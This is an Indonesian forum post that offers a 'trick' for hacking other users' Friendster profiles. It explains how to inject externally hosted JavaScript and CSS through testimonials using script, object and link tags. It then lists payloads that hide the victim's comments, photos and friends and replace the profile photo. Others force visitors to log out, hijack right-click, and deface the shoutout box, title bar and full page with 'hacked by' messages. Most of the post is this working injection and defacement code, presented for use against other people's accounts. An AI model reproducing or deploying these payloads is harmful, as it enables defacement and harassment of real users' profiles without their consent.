Ternyata memang benar, pengguna Friendster terbanyak adalah orang Indonesia.
Jadi, gue yakin klo nih trik gue share bakalan menarik
Trik ini 100% berfungsi dengan baik!!
1. Siapkan web hosting. Jangan Ripway <-- udah di blacklist sama admin FS
http://www.fileave.com (recommended)
2. Siapkan & upload hack.js & hack.css
3. Masukkan script2nya ke file hack.css/hack.js
4. Siapkan Linker buat menginject hack.js & hack.css lewat testimonial
¤ Linker for JS ¤
Code:
Quote:
<script type='text/javascript' src='http://www.fileave.com/friendster/hack.js'></script>
Code:
Quote:
<object width="0" type='text/javascript' data=" javascript:v=document.createElement('script');v.sr c='http://www.fileave.com/friendster/hack.js';parent.document.getElementById('navigatio n').app endChild(v);"></object*gt;
¤ Linker for CSS ¤
Code:
Quote:
<link rel='stylesheet' type='text/css' href='http://www.fileave.com/friendster/hack.css'>
¤ CSS SCRIPT ¤
1. Remove Check Comment
[biar comment kita ga bisa dicentang]
Code:
Quote:
.check {display:none;}
2. Remove Comment Box
[biar ga ada yg bisa kasih comment]
Code:
Quote:
.boxcontent {display:none;}
3. Remove Comment list
[menghilangkan comment list di halaman comment]
Code:
Quote:
#commentActions {display:none;}
4. Remove Comment list
[menghilangkan comment list di halaman profile]
Code:
Quote:
.publiccomments {display:none;}
5. Remove Photo Gallery Box
Code:
Quote:
.photos {display:none;}
6. Remove Friends Box
Code:
Quote:
#content_2 {display:none;}
7. Remove More About Box
Code:
Quote:
.moreabout {display:none;}
8. Change Primary Photo
[mengganti foto utama profile si target dengan foto yg kita inginkan]
Code:
Quote:
div.imgblock200 {
background:url(http://<font color="Blue">www.fileav...o.jpg</font>);
background-position: center;
background-repeat: no-repeat;
height: 120px;
width: 97px; }
div.imgblock200 img {display:none !important}
9. HACK PROFILE BY YOU !!
[membuat profile si target BLANK & kita ganti dgn background kita]
Code:
Quote:
html, body {
background-image: url('http://www.fileave.com/friendster/hack.jpg');
background-color: #ffffff;
background-attachment: fixed;
background-position: center;
background-repeat: no-repeat;
}
#banneradrow, #footer_container, #navigation, #content_0, #content_1, .photos, #content_6, #commentActions, .moreabout, #content_18, .publiccomments, .boxcontent, .statusmessagebox, .tabModuleTabs, .scrapbook, .Application, .AppModule, .rtd, h1, h2, .blogs, .reviews {display:none!important;}
¤ JS SCRIPT ¤
1. Redirect Page
Code:
Quote:
var myplace = document.location.href;
if (myplace == 'http://profiles.friendster.com/user.php?uid='){
}
else if (myplace == 'http://profiles.friendster.com/user.php?uid='){
}
else {
location.href = 'http://www.friendster.com/logout.php';
}
2. Call Script if Right Click
Code:
Quote:
function noRclick( event )
{
if( event.which == 3 )
{
alert( msg );
return false;
}
return true;
}
function noRclick2()
{
alert( msg );
top.location.href = "http://www.fileave.com/friendster/script.js";
return false;
}
document.oncontextmenu = noRclick2;
document.captureEvents( Event.MOUSEDOWN );
if( document.layers ) document.onmousedown = noRclick;
3. Hack Shoutout
[bisa pake gambar juga]
Code:
Quote:
function shoutoutcus(){
var ephemeral = "<div align='center'>Hi "+pageViewerFName+"...<br>This profile has hacked by F51.<br>Sorry about this but you must create new account Friendster !! ^_^</div>";
document.getElementById('cpShoutoutBox').style.hei ght='146';
document.getElementById('cpShoutoutBox').style.ove rflow='auto';
document.getElementById('cpShoutoutBox').innerHTML = "<table width='100%'><tr><td align='center'>"+ephemeral+"</td></tr></table>";
}setTimeout("shoutoutcus()",4000);
4. Hack Title bar
Code:
Quote:
var message = new Array()
message[0] = "-=[- This porfile has hack by F51 -]=-";
message[1] = "-=[- Thanks for your attention -]=-";
message[2] = "-=[- I hope u understand what I mean -]=-";
message[3] = "-=[- Please leave this page -]=-";
message[4] = "-=[- Regards, Cyb3rclown -]=-"
var reps = 2
var speed = 100
var p=message.length;
var T="";
var C=0;
var mC=0;
var s=0;
var sT=null;
if(reps<1)reps=1;
function doTheThing(){
T=message[mC];
A();}
function A(){
s++
if(s>8){s=1}
if(s==1){document.title='||||||====||| '+T+' |||====||||||'}
if(s==2){document.title='|||=|||===||| '+T+' |||===|||=|||'}
if(s==3){document.title='|||==|||==||| '+T+' |||==|||==|||'}
if(s==4){document.title='|||===|||=||| '+T+' |||=|||===|||'}
if(s==5){document.title='|||====|||||| '+T+' ||||||====|||'}
if(s==6){document.title='|||===|||=||| '+T+' |||=|||===|||'}
if(s==7){document.title='|||==|||==||| '+T+' |||==|||==|||'}
if(s==8){document.title='|||=|||===||| '+T+' |||===|||=|||'}
if(C<(8*reps)){
sT=setTimeout("A()",speed);
C++
}else{
C=0;
s=0;
mC++
if(mC>p-1)mC=0;
sT=null;
doTheThing();}}
doTheThing();
5. Hack Photo Gallery with Your Sliding Photo
[http://www.slide.com]
Code:
Quote:
if (!attachOnLoadHandler(function(){embed()})) window.onload = function(){embed()};
function embed(){
var slodde = "<embed src=\"http://widget-e7.slide.com/widgets/slideticker.swf\" scale=\"noscale\" salign=\"l\" bgcolor=\"#000000\" flashvars=\"cy=fr&il=1&channel=2522015791330848019 &site=widget-e7.slide.com\" style=\"width:100%;height:125px\" name=\"flashticker\" align=\"middle\"/><div style=\"width:100%;text-align:center;\"><a href=\"http://www.friendster.com/photos/1234567\" target=\"_blank\"><b>View All Photo</b></a></div>";
document.getElementById('content_1').style.height= '100%';
document.getElementById('content_1').style.overflo wY='hidden';
document.getElementById('content_1').innerHTML = "<table width='100%'><tr><td align='center'>"+slodde+"</td></tr></table>";
}setTimeout("embed()",10000);
6. Hack Favicon
[mengganti icon yang ada address bar]
Code:
Quote:
var icon = document.createElement("link");
icon.rel = "SHORTCUT ICON";
icon.href = "http://www.fileave.com/friendsteron.gif";
document.getElementsByTagName("head")[0].appendChild(icon);
7. HACK PROFILE BY YOU !!
[Paling keren!!Coba aja... ^_^]
Code:
Quote:
loader=new loader();
function loader() {
this.hide=function() {
lding.style.display='none';
}
var lding = document.getElementById('navBg');
myWidth = screen.availWidth;
myHeight = screen.availHeight;
lding.style.zIndex=1000;
lding.style.backgroundImage ="url()";
lding.style.backgroundRepeat='repeat';
lding.style.position = 'fixed';
lding.style.top = '0px';
lding.style.left = '0px';
lding.style.width = myWidth;
lding.style.height = myHeight;
lding.style.overflow = 'hidden';
lding.style.display='';
lding.innerHTML="<br><br><br><br><br><br><br><br>< br><br><br><br><br><br><br><br><center><br><br><fo nt face='arial' color='red' size='5'>Hi "+pageViewerFName+"...<br><br>This profile has hack by Cyb3rclown<br><br>You must go away from here bybeh !!<br><br>Follow me if u can..!!<br><br><br><br><br></font></center>";
}
if ( ! attachOnLoadHandler(function () { loadBox();}))
window.onload = function () { loadBox();};
function loadBox() {
var ld=setTimeout("loader.hide()",1000000);
}
Yang gw share ga semua. Maap ya, kalo share semua terlalu banyak. dari segini juga bisa dikembangin xD
Share This Thread